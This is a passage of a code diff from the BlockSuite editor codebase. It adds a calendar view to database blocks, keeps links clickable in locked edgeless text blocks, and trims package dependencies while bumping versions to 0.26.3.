removeEmptyLine: true,
})
.pipe(({ insertedDatabaseBlockId }) => {
if (insertedDatabaseBlockId) {
const telemetry = std.getOptional(TelemetryProvider);
telemetry?.track('BlockCreated', {
blockType: 'affine:database',
});
}
})
.run();
},
},
{
name: 'Kanban View',
description: 'Visualize data in a dashboard.',
@@ -34,6 +34,7 @@ import {
type SingleView,
uniMap,
} from '@blocksuite/data-view';
import { CalendarExternalSourceProvider } from '@blocksuite/data-view/view-presets';
import { widgetPresets } from '@blocksuite/data-view/widget-presets';
import { IS_MOBILE } from '@blocksuite/global/env';
import { Rect } from '@blocksuite/global/gfx';
@@ -150,6 +151,14 @@ export class DatabaseBlockComponent extends CaptionedBlockComponent<DatabaseBloc
config
);
});
this.std.provider
.getAll(CalendarExternalSourceProvider)
.forEach(source => {
dataSource.serviceSet(
CalendarExternalSourceProvider(source.id),
source
);
});
});
const id = currentViewStorage.getCurrentView(this.model.id);
if (id && dataSource.viewManager.viewGet(id)) {
@@ -293,6 +302,12 @@ export class DatabaseBlockComponent extends CaptionedBlockComponent<DatabaseBloc
widgetPresets.tools.viewOptions,
widgetPresets.tools.tableAddRow,
],
calendar: [
widgetPresets.tools.filter,
widgetPresets.tools.search,
widgetPresets.tools.viewOptions,
widgetPresets.tools.tableAddRow,
],
});
private readonly viewSelection$ = computed(() => {
@@ -427,6 +442,7 @@ export class DatabaseBlockComponent extends CaptionedBlockComponent<DatabaseBloc
headerWidget: this.headerWidget,
onDrag: this.onDrag,
clipboard: this.std.clipboard,
dnd: this.std.dnd,
notification: {
toast: message => {
const notification = this.std.getOptional(NotificationProvider);
@@ -47,7 +47,7 @@ export const databasePropertyConverts = [
propertyModelPresets.multiSelectPropertyModelConfig,
(_property, cells) => {
const options: Record<string, SelectTag> = {};
// eslint-disable-next-line sonarjs/no-identical-functions
// oxlint-disable-next-line sonarjs/no-identical-functions
const getTag = (name: string) => {
if (options[name]) return options[name];
const tag: SelectTag = {
@@ -4,6 +4,7 @@ import { viewConverts, viewPresets } from '@blocksuite/data-view/view-presets';
export const databaseBlockViews: ViewMeta[] = [
viewPresets.tableViewMeta,
viewPresets.kanbanViewMeta,
viewPresets.calendarViewMeta,
];
export const databaseBlockViewMap = Object.fromEntries(
+2 -10
View File
@@ -15,18 +15,10 @@
"@blocksuite/affine-model": "workspace:*",
"@blocksuite/affine-rich-text": "workspace:*",
"@blocksuite/affine-shared": "workspace:*",
"@blocksuite/global": "workspace:*",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"lit": "^3.2.0"
},
"exports": {
".": "./src/index.ts",
@@ -39,5 +31,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -12,7 +12,6 @@
{ "path": "../../model" },
{ "path": "../../rich-text" },
{ "path": "../../shared" },
{ "path": "../../../framework/global" },
{ "path": "../../../framework/std" },
{ "path": "../../../framework/store" }
]
@@ -11,26 +11,17 @@
"license": "MIT",
"dependencies": {
"@blocksuite/affine-block-surface": "workspace:*",
"@blocksuite/affine-components": "workspace:*",
"@blocksuite/affine-ext-loader": "workspace:*",
"@blocksuite/affine-gfx-text": "workspace:*",
"@blocksuite/affine-inline-preset": "workspace:*",
"@blocksuite/affine-model": "workspace:*",
"@blocksuite/affine-rich-text": "workspace:*",
"@blocksuite/affine-shared": "workspace:*",
"@blocksuite/affine-widget-edgeless-toolbar": "workspace:*",
"@blocksuite/global": "workspace:*",
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"lit": "^3.2.0"
},
"exports": {
".": "./src/index.ts",
@@ -43,5 +34,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -43,6 +43,11 @@ export class EdgelessTextBlockComponent extends GfxBlockComponent<EdgelessTextBl
font-weight: var(--edgeless-text-font-weight);
text-align: var(--edgeless-text-text-align);
}
.edgeless-text-block-container .locked-content a[href] {
pointer-events: auto;
cursor: pointer;
}
`;
private readonly _resizeObserver = new ResizeObserver(() => {
@@ -304,6 +309,7 @@ export class EdgelessTextBlockComponent extends GfxBlockComponent<EdgelessTextBl
style=${styleMap(containerStyle)}
>
<div
class=${!editing && this.model.isLocked() ? 'locked-content' : ''}
style=${styleMap({
pointerEvents: editing ? 'auto' : 'none',
userSelect: editing ? 'auto' : 'none',
@@ -8,14 +8,12 @@
"include": ["./src"],
"references": [
{ "path": "../surface" },
{ "path": "../../components" },
{ "path": "../../ext-loader" },
{ "path": "../../gfx/text" },
{ "path": "../../inlines/preset" },
{ "path": "../../model" },
{ "path": "../../rich-text" },
{ "path": "../../shared" },
{ "path": "../../widgets/edgeless-toolbar" },
{ "path": "../../../framework/global" },
{ "path": "../../../framework/std" },
{ "path": "../../../framework/store" }
@@ -23,20 +23,12 @@
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/lodash-es": "^4.17.12",
"lit": "^3.2.0",
"lodash-es": "^4.17.23",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"yjs": "^13.6.27",
"zod": "^3.25.76"
},
"devDependencies": {
"vitest": "^3.2.4"
"yjs": "^13.6.27"
},
"exports": {
".": "./src/index.ts",
@@ -49,5 +41,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}

Some files were not shown because too many files have changed in this diff Show More